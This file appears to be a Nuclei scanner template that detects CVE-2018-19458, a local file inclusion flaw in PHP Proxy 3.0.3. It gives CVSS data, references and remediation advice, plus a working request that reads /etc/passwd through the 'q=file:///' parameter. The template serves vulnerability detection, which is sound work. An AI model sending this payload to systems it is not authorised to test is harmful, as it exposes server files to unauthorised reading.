47 lines
1.8 KiB
YAML
47 lines
1.8 KiB
YAML
id: CVE-2018-19458
|
|
|
|
info:
|
|
name: PHP Proxy 3.0.3 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
|
|
remediation: |
|
|
Upgrade PHP Proxy to a version that is not affected by the vulnerability (3.0.4 or later) or apply the necessary patches provided by the vendor.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/45780
|
|
- https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-19458
|
|
- https://www.exploit-db.com/exploits/45780/
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-19458
|
|
cwe-id: CWE-287
|
|
epss-score: 0.09157
|
|
epss-percentile: 0.94094
|
|
cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: php-proxy
|
|
product: php-proxy
|
|
tags: cve,cve2018,edb,lfi,proxy,php-proxy
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?q=file:///etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220204f850c1e4defb3d1370eca6bbeda7634b6bae66b03d027afb26bedc5a812790221008d7871c547a7ed1deeb7c785fd365cc8f4ff36b31cf24980d303f8a20351e93d:922c64590222798bb761d5b6d8e72950 |